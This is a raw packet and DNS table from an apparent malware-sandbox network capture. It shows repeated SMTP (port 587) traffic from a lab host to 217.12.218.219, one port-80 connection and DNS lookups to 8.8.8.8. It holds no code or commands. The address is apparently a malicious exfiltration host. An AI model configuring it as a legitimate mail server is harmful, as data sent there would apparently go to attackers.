                                              Sep 26, 2024 09:20:03.193809986 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193836927 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193864107 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193891048 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193917036 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193943024 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193969965 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.193996906 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194045067 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194072008 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194098949 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194125891 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194152117 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194179058 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194205046 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194231987 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194257975 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.194401979 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.194675922 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.199373007 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199415922 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199443102 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199496031 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199523926 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199551105 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199577093 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199604034 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199665070 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199692011 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199734926 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199762106 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199790955 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199831009 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199857950 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199884892 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199911118 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199939013 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.199990988 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200018883 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200046062 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200072050 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200099945 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200125933 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200153112 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200179100 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200205088 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200232029 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.200378895 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.200438023 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.205385923 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205415010 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205441952 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205468893 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205521107 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205549002 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205575943 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205602884 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205629110 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205674887 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205724001 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205750942 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205777884 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205804110 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.205921888 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.205979109 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.210812092 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.466583014 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:03.570375919 CEST49181587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:03.717004061 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:04.393352032 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:04.393434048 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:04.393795967 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:04.393855095 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:04.394263983 CEST58749180217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:04.394328117 CEST49180587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:04.395656109 CEST58749181217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:04.395725965 CEST49181587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:05.132533073 CEST58749181217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:05.132725000 CEST49181587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:05.137618065 CEST58749181217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:05.230478048 CEST49181587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:05.235889912 CEST58749181217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:05.235975027 CEST49181587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:15.486154079 CEST4916580192.168.2.22132.226.247.73
                                              Sep 26, 2024 09:20:15.832921982 CEST49182587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:15.837904930 CEST58749182217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:15.837971926 CEST49182587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:15.869513035 CEST49182587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:20:15.874495029 CEST58749182217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:20:15.874579906 CEST49182587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:10.622761011 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:10.630096912 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:10.631118059 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.370918989 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.371081114 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.376074076 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.542587996 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.542742014 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.547575951 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.715711117 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.716206074 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.721107006 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.902754068 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.902877092 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.902894974 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.902925968 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:11.902926922 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.902973890 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:11.992140055 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.000875950 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.005731106 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.172755003 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.175633907 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.180440903 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.347023964 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.347219944 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.352027893 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.519306898 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.519536972 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.524363041 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.691251993 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.691517115 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.696310043 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.862957001 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:12.863346100 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:12.868163109 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.083110094 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.083283901 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.088064909 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.260087013 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.260691881 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.260760069 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.260824919 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.260890961 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.263747931 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.265476942 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.265542030 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.265575886 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.265590906 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.265640020 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.265707970 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.268547058 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.268829107 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.270426035 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.270441055 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.270494938 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.273652077 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.273699999 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.273746967 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.273804903 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.275374889 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.275407076 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.275418997 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.275454998 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.275486946 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.275489092 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.275532007 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.278470039 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.278593063 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.278635025 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.278696060 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.280436993 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.280447960 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.280467033 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.280488014 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.280497074 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.280529022 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.280827999 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.283411980 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.283493996 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.283518076 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.283538103 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.283576012 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.283576012 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.285381079 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285408974 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285434008 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285548925 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285586119 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285594940 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285614967 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285676956 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285703897 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.285820007 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.288456917 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.288528919 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.288537979 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.290122032 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.290520906 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.292171001 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292181015 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292210102 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292222977 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292239904 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292296886 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292340040 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292483091 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292525053 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292538881 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292561054 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292570114 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292574883 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292578936 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.292943001 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.295425892 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295543909 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295557976 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295583010 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295593023 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295610905 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295633078 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295645952 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295656919 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295689106 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295697927 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295715094 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295787096 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.295799971 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.296112061 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.299195051 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299206018 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299253941 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299263954 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299274921 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299288034 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299300909 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299551964 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299563885 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299631119 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299638987 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299657106 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299669027 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.299680948 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.300014019 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.301709890 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301738977 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301753044 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301762104 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301781893 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301794052 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301837921 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301884890 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301893950 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301911116 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301922083 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301951885 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301960945 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.301980019 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.302423954 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.305830956 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305845976 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305871010 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305882931 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305926085 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305933952 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.305949926 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306525946 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306545973 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306638002 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306647062 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306664944 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306673050 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.306688070 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307161093 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.307777882 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307787895 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307807922 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307842016 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307851076 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307871103 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307882071 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307895899 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307917118 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307929039 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307940960 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307952881 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307966948 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.307975054 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.308239937 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.312011957 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312076092 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312138081 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312180042 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312256098 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312298059 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312338114 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312378883 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312418938 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312455893 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312495947 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312555075 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312567949 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312588930 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.312980890 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.313069105 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313079119 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313129902 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313138962 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313160896 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313173056 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313193083 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313205004 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.313292980 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.313328028 CEST49183587192.168.2.22217.12.218.219
                                              Sep 26, 2024 09:21:13.318346977 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.318414927 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.737855911 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.951723099 CEST58749183217.12.218.219192.168.2.22
                                              Sep 26, 2024 09:21:13.951787949 CEST49183587192.168.2.22217.12.218.219
                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 26, 2024 09:19:26.586587906 CEST5456253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:26.715449095 CEST53545628.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:26.767976999 CEST5291753192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:26.776418924 CEST53529178.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:27.556958914 CEST6275153192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:27.566807032 CEST53627518.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:29.469259977 CEST5789353192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:29.475591898 CEST53578938.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:29.478178978 CEST5482153192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:29.484837055 CEST53548218.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:30.218724012 CEST5471953192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:30.228991032 CEST53547198.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:31.247973919 CEST4988153192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:31.255779982 CEST53498818.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:31.259965897 CEST5499853192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:31.266483068 CEST53549988.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:31.743609905 CEST5278153192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:31.753287077 CEST53527818.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:32.393208981 CEST6392653192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:32.400039911 CEST53639268.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:32.402793884 CEST6551053192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:32.410713911 CEST53655108.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:33.324820042 CEST6267253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:33.331862926 CEST53626728.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:33.992482901 CEST5647553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:33.998795033 CEST53564758.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:34.001797915 CEST4938453192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:34.008224964 CEST53493848.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:35.393383026 CEST5484253192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:35.400599957 CEST53548428.8.8.8192.168.2.22
                                              Sep 26, 2024 09:19:36.052402973 CEST5810553192.168.2.228.8.8.8
                                              Sep 26, 2024 09:19:36.058707952 CEST53581058.8.8.8192.168.2.22
